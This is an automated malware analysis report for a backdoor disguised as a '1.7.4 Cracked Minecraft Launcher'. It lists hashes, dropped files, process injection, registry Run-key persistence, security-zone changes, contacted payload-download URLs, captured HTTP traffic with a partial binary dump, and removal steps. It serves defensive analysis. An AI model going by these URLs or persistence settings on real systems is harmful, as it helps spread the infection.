Trojan.Win32.Inject.mwhq (Kaspersky), Trojan.GenericKD.1665749 (AdAware), Backdoor.Win32.Farfli.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 7061c534cea9592508ea2e112d07029c
SHA1: a790bf538dee4543a267876ba10412a8eed9b974
SHA256: 710fc5cfca48bcca67fc437cdcce79f40f7d6664870f0ccc88a5616ca2ec0a61
SSDeep: 24576:U qxd7MUGBUrI88kLKpa8DEnQPNoypNR1o7bw/qaeDQD2hUF6zjyyjaWsiMC/pV:V1xmi8hBYQPNXhswA FKEisFR63
Size: 1933824 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: AirInstaller
Created at: 2014-03-23 13:16:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
879.exe:2224
879.exe:2196
%original file name%.exe:288
%original file name%.exe:1872
104.exe:1524
104.exe:684
104.exe:1956
104.exe:556
InstallDir.exe:2204
InstallDir.exe:2160
The Backdoor injects its code into the following process(es):
javaw.exe:680
svchost.exe:1592
iexplore.exe:3128
File activity
The process 879.exe:2224 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (1916 bytes)
The Backdoor deletes the following file(s):
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (0 bytes)
The process 879.exe:2196 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
The Backdoor deletes the following file(s):
The process %original file name%.exe:288 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (5442 bytes)
The process %original file name%.exe:1872 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (1646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\InstallDir\InstallDir.exe (20436 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.dat (298 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\x.html (0 bytes)
The process 104.exe:1524 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
The process 104.exe:684 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (239350 bytes)
The Backdoor deletes the following file(s):
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (0 bytes)
The process 104.exe:1956 makes changes in the file system.
The Backdoor deletes the following file(s):
The process 104.exe:556 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (22474 bytes)
The Backdoor deletes the following file(s):
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (0 bytes)
The process InstallDir.exe:2204 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\x.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (0 bytes)
The process InstallDir.exe:2160 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\879.exe (5442 bytes)
Registry activity
The process 879.exe:2224 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 6A 9D 0F 52 26 BE E6 F1 61 89 1D AB D7 06 4E"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "879.exe"
The process %original file name%.exe:288 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 AC 78 2E EE 9B 5F 39 3B DD 60 B6 D9 64 A8 3B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"104.exe" = "1.7.4 Cracked Minecraft Launcher"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"wshext.dll,-4802"
"wshext.dll,-4803"
"cryptext.dll,-6112"
"cryptext.dll,-6113"
"cryptext.dll,-6110"
"cdfview.dll,-4610"
"accwiz.exe,-16"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9918"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"wshext.dll,-4801"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9927"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9912"
"unregmp2.exe,-9913"
"unregmp2.exe,-9910"
"unregmp2.exe,-9911"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\PCHealth\HelpCtr\Binaries]
"msinfo.dll,-391"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\Movie Maker]
"wmm2res.dll,-63097"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9915"
"unregmp2.exe,-9916"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"RCBdyctl.dll,-150"
"msi.dll,-34"
"msi.dll,-35"
"cryptext.dll,-6111"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12346"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"notepad.exe,-469"
"shscrap.dll,-258"
"wshext.dll,-4805"
"msxml3r.dll,-1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-190"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"scrobj.dll,-8192"
"msxml3r.dll,-2"
"shimgvw.dll,-301"
"PresentationHost.exe,-3306"
"shimgvw.dll,-303"
"shimgvw.dll,-302"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-209"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"shimgvw.dll,-304"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\Internet Explorer\Connection Wizard]
"icwres.dll,-20003"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"shimgvw.dll,-306"
"shimgvw.dll,-305"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9902"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"zipfldr.dll,-10195"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@""%Program Files%\Windows NT\Accessories]
"WORDPAD.EXE"",-208"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"cryptext.dll,-6109"
"cryptext.dll,-6108"
"wshext.dll,-4800"
"shimgvw.dll,-307"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12345"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"netshell.dll,-1300"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"conf.exe,-12347"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Procmon.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-22978"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9923"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%Program Files%\NetMeeting]
"nmwb.dll,-1234"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9920"
"unregmp2.exe,-9909"
"unregmp2.exe,-9926"
"unregmp2.exe,-9925"
"unregmp2.exe,-9905"
"unregmp2.exe,-9904"
"unregmp2.exe,-9907"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"PresentationHost.exe,-3308"
"mmcbase.dll,-130"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9903"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"pdh.dll,-10023"
"icardres.dll.mui,-4162"
"SHELL32.dll,-8964"
"icardres.dll.mui,-4146"
"SHELL32.dll,-9227"
"setupapi.dll,-2000"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"cmd.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"sandbox_svc.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-881"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"cryptext.dll,-6145"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9914"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"PresentationHost.exe,-3300"
"wshext.dll,-4804"
"ntbackup.exe,-40"
"SHELL32.dll,-9217"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%WinDir%\inf]
"unregmp2.exe,-9908"
The process %original file name%.exe:1872 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 27 22 12 24 E0 95 6E 4B 24 E2 13 92 FC 27 0A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir]
"InstallDir.exe" = "VNC® Chat"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\YwRtlw]
"InstalledServer" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
"ServerStarted" = "6/15/2014 9:12:20 AM"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
The process 104.exe:684 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 96 42 BB A2 BD 7C 7F EF EE E7 50 D2 E3 1B 49"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "104.exe"
The process 104.exe:556 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC CF CF 2B FB C3 42 6C 85 0D 30 EF 9F 34 47 67"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "104.exe"
The process InstallDir.exe:2204 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\YwRtlw]
"InstalledServer" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\YwRtlw]
"ServerStarted" = "6/15/2014 9:13:00 AM"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\2204]
"Mutex" = "YwRtlw"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 89 4A E1 20 3E 72 01 F0 05 4F 20 C2 2C C0 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
The process InstallDir.exe:2160 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 41 9E F3 C3 CB 81 70 D3 D5 3C 55 C4 C4 80 F9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"879.exe" = "1.7.4 Cracked Minecraft Launcher"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
49a4c5726b27df7d7fe01b938f3e68f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\104.exe |
5474216f6a34fd7a15b65a9c049f6287 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\879.exe |
b427962bdb196d132af50f6c7b78380d | c:\Program Files\Java\jre6\launch4j-tmp\879.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
879.exe:2224
879.exe:2196
%original file name%.exe:288
%original file name%.exe:1872
104.exe:1524
104.exe:684
104.exe:1956
104.exe:556
InstallDir.exe:2204
InstallDir.exe:2160 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\104.exe (5442 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (1646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\InstallDir\InstallDir.exe (20436 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.dat (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (1916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\879.exe (5442 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: RealVNC Ltd
Product Name: HD Player
Product Version: 5.0.6 (r113416)
Legal Copyright: Copyright (c) 2002-2013 RealVNC Ltd.
Legal Trademarks: VNC is a registered trademark of RealVNC Ltd. in the U.S. and in other countries.
Original Filename: vncchat.exe
Internal Name: vncchat
File Version: 5.0.6 (r113416)
File Description:
Comments:
Language: English (United States)
Company Name: RealVNC LtdProduct Name: HD Player Product Version: 5.0.6 (r113416)Legal Copyright: Copyright (c) 2002-2013 RealVNC Ltd.Legal Trademarks: VNC is a registered trademark of RealVNC Ltd. in the U.S. and in other countries.Original Filename: vncchat.exeInternal Name: vncchatFile Version: 5.0.6 (r113416)File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 1663108 | 1663488 | 5.5427 | 19b64f2a3605f24c0adcfb9f0b9fa548 |
.rsrc | 1679360 | 268930 | 269312 | 4.45655 | 0298a39ab4fadfd1ee49aec74cb73937 |
.reloc | 1949696 | 12 | 512 | 0.067931 | 0a5bd6c7acedbd1af33ea553c85bf0da |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://titanindex.net/LauncherUpdate/Minecraft Launcher.exe | |
hxxp://stats.teamextrememc.com/countgif.php | 162.159.247.124 |
hxxp://www.titanindex.net/LauncherUpdate/Minecraft Launcher.exe | 96.47.231.234 |
s3.amazonaws.com | 54.240.235.3 |
dl.dropboxusercontent.com | 50.16.206.191 |
dl.dropbox.com | 54.243.91.124 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /LauncherUpdate/Minecraft Launcher.exe HTTP/1.1
User-Agent: Java/1.6.0_18
Host: VVV.titanindex.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 15 Jun 2014 11:06:14 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Last-Modified: Sun, 08 Jun 2014 17:37:33 GMT
ETag: "66a069b-17c244-4fb568cb44360"
Accept-Ranges: bytes
Content-Length: 1557060
Connection: close
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..S.................H...H...............`....@..........................`............@... ...................................... ..T2...........................................................................................................text...(G.......H.................. .0`.data........`.......L..............@.0..rdata.......p.......N..............@.0@.bss..................................0..idata...............T..............@.0..rsrc...T2... ...4...`..............@.0.........................................................................................................................................................................................................................................................................................................................................................................................................................U......]..U.1..u...1...=....wC=....r[.......$....1..T$..TD.....tz..t...$..............u..]...]...=....t.wJ=....t....u..]...]....=....t[=....u...$....1..t$...C.....tj..t...$........=........$..........L$...C......v....3A...l.....$....1..L$...C.....t0....R.....$.......?.....$..........D$..lC...%.....$..........\$..RC...............'....U..S..$.]...$..@.."D.......@...E........@..U..\$....`@..D$..T$..L$...$..@...C.....A...tX..`@.....A............t ...A..D$.....A..K0..$..B......A....t.....A..\$.....A..QP..$..
<<
<<< skipped >>>
GET /countgif.php HTTP/1.1
User-Agent: Java/1.6.0_18
Host: stats.teamextrememc.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sun, 15 Jun 2014 11:06:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d12838b93bfa00f1babb6383ccc8533421402830383000; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.teamextrememc.com; HttpOnly
Cache-Control: max-age=10
Expires: Sun, 15 Jun 2014 11:06:33 GMT
CF-RAY: 13ae4c45c81a020d-IAD
